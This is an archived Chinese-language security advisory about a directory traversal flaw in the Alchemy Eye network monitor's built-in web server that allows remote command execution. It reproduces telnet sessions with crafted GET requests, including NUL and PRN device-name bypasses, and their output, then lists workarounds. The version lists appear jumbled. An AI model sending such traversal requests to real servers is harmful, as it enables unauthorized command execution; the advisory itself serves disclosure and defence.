首页 -> 安全研究
安全研究
安全漏洞
Alchemy Eye远程执行任意命令漏洞
发布日期:2001-11-29
更新日期:2001-12-07
受影响系统:
不受影响系统:
Alchemy Lab Alchemy Eye 2.0
Alchemy Lab Alchemy Eye 2.1
Alchemy Lab Alchemy Eye 2.2
Alchemy Lab Alchemy Eye 2.3
Alchemy Lab Alchemy Eye 2.4
Alchemy Lab Alchemy Eye 2.5
Alchemy Lab Alchemy Eye 2.6
Alchemy Lab Alchemy Eye 3.0
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 2000
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000 SP2
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
描述:
Alchemy Lab Alchemy Eye 1.7
Alchemy Lab Alchemy Eye 1.8
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 2000
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000 SP2
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
BUGTRAQ ID: 3599
CVE(CAN) ID: CAN-2001-0871
Alchemy Eye是一个Windows平台下的网络监控软件,由Alchemy Labs维护。
Alchemy Eye有一个内建的HTTP服务器,用于监视和控制。这个HTTP服务器存在目录遍
历漏洞,可以使攻击者在主机上执行任意命令。
<*来源:Rapid 7 Security Advisories (advisory@rapid7.com)
链接:http://archives.neohapsis.com/archives/bugtraq/2001-11/0287.html
http://www.rapid7.com
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Rapid 7 Security Advisories提供了如下漏洞演示:
从2.x到2.6的版本可以用简单的dotdot目录遍历执行任意命令:
$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/../../../../WINNT/system32/ipconfig.exe HTTP/1.0
HTTP/1.0 200 OK
Date: Thu, 29 Nov 2001 18:20:00 GMT
Server: Alchemy Eye/2.0.20
MIME-version: 1.0
Content-Type: text/html
Location: /cgi-bin/../../../../WINNT/system32/ipconfig.exe
Content-Length: 275
Windows 2000 IP Configuration
Ethernet adapter Cable:
Connection-specific DNS Suffix . : foo.bar.com
IP Address. . . . . . . . . . . . : 192.168.0.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1
2.6以后的版本不再能用简单的dotdot遍历:
$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/../../../../WINNT/system32/ipconfig.exe HTTP/1.0
HTTP/1.0 403 Forbidden
Server: Alchemy Eye/2.6.16
MIME-version: 1.0
Content-Type: text/plain
Location: /cgi-bin/../../../../WINNT/system32/ipconfig.exe
Content-Length: 9
Forbidden
然而可以用另外的变种来利用它,在dotdot前面加Windows “NUL”设备名:
$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe HTTP/1.0
HTTP/1.0 200 OK
Server: Alchemy Eye/2.6.16
MIME-version: 1.0
Content-Type: text/html
Location: /cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe
Content-Length: 275
Windows 2000 IP Configuration
Ethernet adapter Cable:
Connection-specific DNS Suffix . : foo.bar.com
IP Address. . . . . . . . . . . . : 192.168.0.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1
2.7.x的版本注意到了“NUL”设备名问题,但还是有漏洞,如果使用“PRN”等其他的设
备名,而不是“NUL”:
$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/PRN/../../../../WINNT/system32/ipconfig.exe HTTP/1.0
HTTP/1.0 200 OK
Server: Alchemy Eye/3.0.10
MIME-version: 1.0
Content-Type: text/html
Location: /cgi-bin/PRN/../../../../WINNT/system32/ipconfig.exe
Content-Length: 275
Windows 2000 IP Configuration
Ethernet adapter Cable:
Connection-specific DNS Suffix . : foo.bar.com
IP Address. . . . . . . . . . . . : 192.168.0.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1
攻击者不能执行带参数的命令,因为HTTP服务器不能处理空格。
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 在选项中禁掉HTTP界面的使用。
* 控制可以使用HTTP界面的IP范围,或者设置HTTP认证,确信只有可信任的用户可以
访问HTTP管理界面。
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.alchemy-lab.com/products/eye/
浏览次数:4069
严重程度:0(网友投票)
绿盟科技给您安全的保障